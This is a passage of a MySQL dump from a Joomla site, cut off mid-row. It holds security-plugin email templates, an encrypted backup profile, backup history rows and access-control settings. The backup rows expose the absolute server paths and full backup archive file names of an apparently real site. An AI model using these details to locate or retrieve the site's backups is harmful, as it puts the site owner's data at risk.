INSERT INTO `j25_admintools_waftemplates` VALUES (1,'all','*','Security exception on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>We would like to notify you that a security exception was detected on your site, [SITENAME], with the following details:</p>\r\n<p>IP Address: [IP] (IP Lookup: [LOOKUP])<br />Reason: [REASON]</p>\r\n<p>If this kind of security exception repeats itself, please log in to your site\'s back-end and add this IP address to your Admin Tools\'s Web Application Firewall feature in order to completely block the misbehaving user.</p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2014-04-14 14:36:34',800,'2014-04-14 14:42:38',800),(2,'user-reactivate','*','User deactivated on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>on [DATE] the user account [USER] was de-activated because too many failed logins were detected coming from IP address: [IP].</p>\r\n<p>Please click on the following link to activate the user account again:<br />[ACTIVATE]</p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,0,0,'','2014-04-24 14:44:49',800,'0000-00-00 00:00:00',0),(3,'adminloginfail','*','Failed administrator login for user [USER] on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>We would like to notify you that user <strong>[USER]</strong> did <strong>not</strong> log in successfully to the administrator back-end area of your site, [SITENAME]. <span style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Further information:</span></p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Username: [USER]<br />IP address: [IP] ([LOOKUP])<br />Country*: [COUNTRY]<br />Continent*: [CONTINENT]<br />Browser User Agent string: [UA]</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">* Country and continent information availability and accuracy depend on the GeoIP database installed on your site.</p>\r\n<p>If this expected you need to do nothing about it. If you suspect a hacking attempt, please log in to your site\'s back-end immediately and activate Admin Tools\' Emergency Off-Line mode at once.</p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2015-07-27 13:52:45',800,'2015-07-27 13:58:31',800),(4,'adminloginsuccess','*','User [USER] logged in on [SITENAME] administrator area','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Hello,</p>\r\n<p>We would like to notify you that user [USER] has just logged in to the administrator back-end area of your site, [SITENAME]. Further information:</p>\r\n<p>Username: [USER]<br />IP address: [IP] ([LOOKUP])<br />Country*: [COUNTRY]<br />Continent*: [CONTINENT]<br />Browser User Agent string: [UA]</p>\r\n<p>* Country and continent information availability and accuracy depend on the GeoIP database installed on your site.</p>\r\n<p>If this expected you need to do nothing about it. If you suspect a hacking attempt, please log in to your site\'s back-end immediately and activate Admin Tools\' Emergency Off-Line mode at once.</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Best regards,</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2015-07-27 13:58:08',800,'0000-00-00 00:00:00',0),(5,'ipautoban','*','Automatic IP blocking notification for [IP] on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Hello,</p>\r\n<p>We would like to notify you that the IP address [IP] is now blocked from accessing your site, [SITENAME]<span style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">, with the following details:</span></p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">IP Address: [IP] (IP Lookup: [LOOKUP])<br />Reason: [REASON]<br />Banned until: [UNTIL]</p>\r\n<p>If this is your own IP address and you can no longer access your site please <a href=\"http://akee.ba/lockedout\">follow our instructions</a> to temporarily disable Admin Tools\' Web Application Firewall and clear the automatic IP ban.</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Best regards,</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2015-07-27 14:20:00',800,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `j25_admintools_waftemplates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_ak_profiles`
--

DROP TABLE IF EXISTS `j25_ak_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_ak_profiles` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `configuration` longtext COLLATE utf8mb4_unicode_ci,
  `filters` longtext COLLATE utf8mb4_unicode_ci,
  `quickicon` tinyint(3) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_ak_profiles`
--

LOCK TABLES `j25_ak_profiles` WRITE;
/*!40000 ALTER TABLE `j25_ak_profiles` DISABLE KEYS */;
INSERT INTO `j25_ak_profiles` VALUES (1,'Default Backup Profile','###AES128###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','',1);
/*!40000 ALTER TABLE `j25_ak_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_ak_stats`
--

DROP TABLE IF EXISTS `j25_ak_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_ak_stats` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment` longtext COLLATE utf8mb4_unicode_ci,
  `backupstart` timestamp NULL DEFAULT NULL,
  `backupend` timestamp NULL DEFAULT NULL,
  `status` enum('run','fail','complete') COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'run',
  `origin` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'backend',
  `type` varchar(30) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'full',
  `profile_id` bigint(20) NOT NULL DEFAULT '1',
  `archivename` longtext COLLATE utf8mb4_unicode_ci,
  `absolute_path` longtext COLLATE utf8mb4_unicode_ci,
  `multipart` int(11) NOT NULL DEFAULT '0',
  `tag` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `backupid` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `filesexist` tinyint(3) NOT NULL DEFAULT '1',
  `remote_filename` varchar(1000) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `total_size` bigint(20) NOT NULL DEFAULT '0',
  `frozen` tinyint(1) DEFAULT '0',
  `instep` tinyint(1) DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `idx_fullstatus` (`filesexist`,`status`),
  KEY `idx_stale` (`status`,`origin`)
) ENGINE=InnoDB AUTO_INCREMENT=21 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_ak_stats`
--

LOCK TABLES `j25_ak_stats` WRITE;
/*!40000 ALTER TABLE `j25_ak_stats` DISABLE KEYS */;
INSERT INTO `j25_ak_stats` VALUES (11,'Backup taken on 08.01.2017 13:33','','2017-01-08 11:33:27','2017-01-08 11:34:22','complete','backend','full',1,'site-ekvatorprint.com.ua-20170108-133327.jpa','/sata1/home/users/ekvatorpr/www/www.ekvatorprint.com.ua/administrator/components/com_akeeba/backup/site-ekvatorprint.com.ua-20170108-133327.jpa',1,'backend','id11',0,NULL,263332581,0,0),(12,'Backup taken on 31.01.2017 10:00','','2017-01-31 08:00:39','2017-01-31 08:01:42','complete','backend','full',1,'site-ekvatorprint.com.ua-20170131-100039.jpa','/sata1/home/users/ekvatorpr/www/www.ekvatorprint.com.ua/administrator/components/com_akeeba/backup/site-ekvatorprint.com.ua-20170131-100039.jpa',1,'backend','id12',0,NULL,266065645,0,0),(13,'Backup taken on 14.11.2018 10:55','','2018-11-14 08:55:41','2018-11-14 08:58:22','complete','backend','full',1,'site-ekvatorprint.com.ua-20181114-105541.jpa','/sata1/home/users/ekvatorpr/www/www.ekvatorprint.com.ua/administrator/components/com_akeeba/backup/site-ekvatorprint.com.ua-20181114-105541.jpa',1,'backend','id13',0,NULL,270456731,0,0),(14,'Backup taken on 14.11.2018 11:03','','2018-11-14 09:03:47','2018-11-14 09:04:32','complete','backend','full',1,'site-ekvatorprint.com.ua-20181114-110347.jpa','/sata1/home/users/ekvatorpr/www/www.ekvatorprint.com.ua/administrator/components/com_akeeba/backup/site-ekvatorprint.com.ua-20181114-110347.jpa',1,'backend','id14',0,NULL,270360164,0,0),(15,'Backup taken on 14.11.2018 11:06','','2018-11-14 09:06:10','2018-11-14 09:06:59','complete','backend','full',1,'site-ekvatorprint.com.ua-20181114-110610.jpa','/sata1/home/users/ekvatorpr/www/www.ekvatorprint.com.ua/administrator/components/com_akeeba/backup/site-ekvatorprint.com.ua-20181114-110610.jpa',1,'backend','id15',0,NULL,270358321,0,0),(16,'Backup taken on 14.11.2018 11:08','','2018-11-14 09:08:35','2018-11-14 09:09:22','complete','backend','full',1,'site-ekvatorprint.com.ua-20181114-110835.jpa','/sata1/home/users/ekvatorpr/www/www.ekvatorprint.com.ua/administrator/components/com_akeeba/backup/site-ekvatorprint.com.ua-20181114-110835.jpa',1,'backend','id16',0,NULL,270359804,0,0),(17,'Automatic backup before updating Joomla! 3.9.0 to 3.9.26','','2021-04-26 08:12:31','2021-04-26 08:13:17','complete','backend','full',1,'site-ekvatorprint.com.ua-20210426-111231-HzltA8bPzkJ73fqX.jpa','/sata1/home/users/ekvatorpr/www/www.ekvatorprint.com.ua/administrator/components/com_akeeba/backup/site-ekvatorprint.com.ua-20210426-111231-HzltA8bPzkJ73fqX.jpa',1,'backend','17',1,NULL,323468894,0,1),(18,'Automatic backup before updating Joomla! 3.9.26 to 3.9.27','','2021-06-26 04:35:42','2021-06-26 04:36:18','complete','backend','full',1,'site-ekvatorprint.com.ua-20210626-073542-KHlJqywx85agzzXn.jpa','/sata1/home/users/ekvatorpr/www/www.ekvatorprint.com.ua/administrator/components/com_akeeba/backup/site-ekvatorprint.com.ua-20210626-073542-KHlJqywx85agzzXn.jpa',1,'backend','18',1,NULL,324740671,0,1),(20,'Backup taken on 20.09.2022, 10:43 UTC','','2022-09-20 07:43:48','2022-09-20 07:44:41','complete','backend','full',1,'site-ekvatorprint.com.ua-20220920-104348-xSEMJGInEyhF3qHr.zip','/sata1/home/users/ekvatorpr/www/www.ekvatorprint.com.ua/administrator/components/com_akeeba/backup/site-ekvatorprint.com.ua-20220920-104348-xSEMJGInEyhF3qHr.zip',1,'backend','20',1,NULL,328038153,0,1);
/*!40000 ALTER TABLE `j25_ak_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_ak_storage`
--

DROP TABLE IF EXISTS `j25_ak_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_ak_storage` (
  `tag` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `lastupdate` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `data` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`tag`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_ak_storage`
--

LOCK TABLES `j25_ak_storage` WRITE;
/*!40000 ALTER TABLE `j25_ak_storage` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_ak_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_akeeba_common`
--

DROP TABLE IF EXISTS `j25_akeeba_common`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_akeeba_common` (
  `key` varchar(190) CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,
  `value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_akeeba_common`
--

LOCK TABLES `j25_akeeba_common` WRITE;
/*!40000 ALTER TABLE `j25_akeeba_common` DISABLE KEYS */;
INSERT INTO `j25_akeeba_common` VALUES ('file_fef','[\"com_akeeba\"]'),('fof30','[]'),('fof40','{\"0\":\"com_akeeba\",\"2\":\"plg_quickicon_akeebabackup\",\"3\":\"plg_system_backuponupdate\",\"4\":\"plg_actionlog_akeebabackup\"}'),('stats_lastrun','1663670437'),('stats_siteid','c4751e71ebb6c1270b5f48fcf7639b0701b1d87d'),('stats_siteurl','aba2b450bf1408b569de6dabdfed71a0');
/*!40000 ALTER TABLE `j25_akeeba_common` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_assets`
--

DROP TABLE IF EXISTS `j25_assets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_assets` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `parent_id` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set parent.',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `level` int(10) unsigned NOT NULL COMMENT 'The cached level in the nested tree.',
  `name` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The unique name for the asset.\n',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The descriptive title for the asset.',
  `rules` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded access control.',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_asset_name` (`name`),
  KEY `idx_lft_rgt` (`lft`,`rgt`),
  KEY `idx_parent_id` (`parent_id`)
) ENGINE=InnoDB AUTO_INCREMENT=103 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_assets`
--

LOCK TABLES `j25_assets` WRITE;
/*!40000 ALTER TABLE `j25_assets` DISABLE KEYS */;
INSERT INTO `j25_assets` VALUES (1,0,1,173,0,'root.1','Root Asset','{\"core.login.site\":{\"6\":1,\"2\":1},\"core.login.admin\":{\"6\":1},\"core.login.offline\":{\"6\":1},\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(2,1,1,2,1,'com_admin','com_admin','{}'),(3,1,3,6,1,'com_banners','com_banners','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(4,1,7,8,1,'com_cache','com_cache','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(5,1,9,10,1,'com_checkin','com_checkin','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(6,1,11,12,1,'com_config','com_config','{}'),(7,1,13,18,1,'com_contact','com_contact','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(8,1,19,86,1,'com_content','com_content','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(9,1,87,88,1,'com_cpanel','com_cpanel','{}'),(10,1,89,90,1,'com_installer','com_installer','{\"core.admin\":[],\"core.manage\":{\"7\":0},\"core.delete\":{\"7\":0},\"core.edit.state\":{\"7\":0}}'),(11,1,91,94,1,'com_languages','com_languages','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(12,1,95,96,1,'com_login','com_login','{}'),(13,1,97,98,1,'com_mailto','com_mailto','{}'),(14,1,99,100,1,'com_massmail','com_massmail','{}'),(15,1,101,102,1,'com_media','com_media','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":{\"5\":1}}'),(16,1,103,104,1,'com_menus','com_menus','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(17,1,105,106,1,'com_messages','com_messages','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(18,1,107,114,1,'com_modules','com_modules','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(19,1,115,118,1,'com_newsfeeds','com_newsfeeds','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(20,1,119,120,1,'com_plugins','com_plugins','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(21,1,121,122,1,'com_redirect','com_redirect','{\"core.admin\":{\"7\":1},\"core.manage\":[]}'),(22,1,123,124,1,'com_search','com_search','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(23,1,125,126,1,'com_templates','com_templates','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(24,1,127,130,1,'com_users','com_users','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(25,1,131,134,1,'com_weblinks','com_weblinks','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(26,1,135,136,1,'com_wrapper','com_wrap